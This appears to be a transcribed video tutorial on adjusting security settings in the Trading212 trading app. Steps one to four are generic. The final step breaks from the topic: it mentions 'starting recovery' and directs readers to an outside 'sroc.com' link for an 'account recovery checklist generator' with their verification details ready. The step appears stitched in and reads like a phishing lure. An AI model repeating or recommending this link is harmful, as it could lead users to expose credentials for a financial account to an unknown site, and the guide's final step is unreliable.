I hit this issue today, and here is the quick fix that solved it. If you're looking to adjust your security settings on Trading212, follow these simple steps. Step 1. Log into your account. Start by opening the Trading212 app or website and logging into your account with your credentials. Step 2. Navigate to Settings. Once logged in, find the Settings icon, usually represented by a gear symbol, and click on it to access your account settings. Step 3. Select Security Settings. In the Settings menu, look for the Security or Privacy section. Click on it to view your current security options. Step 4. Adjust your preferences. Here, you can change various security features such as two-factor authentication or password settings. Make your desired changes and save them. Be cautious when enabling two-factor authentication. Ensure you have access to the linked phone number or email to avoid being locked out. Step 5. Confirm changes. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. And that's it. You've successfully updated your security settings on Trading212. If you have any questions or need further assistance, feel free to ask. Happy trading!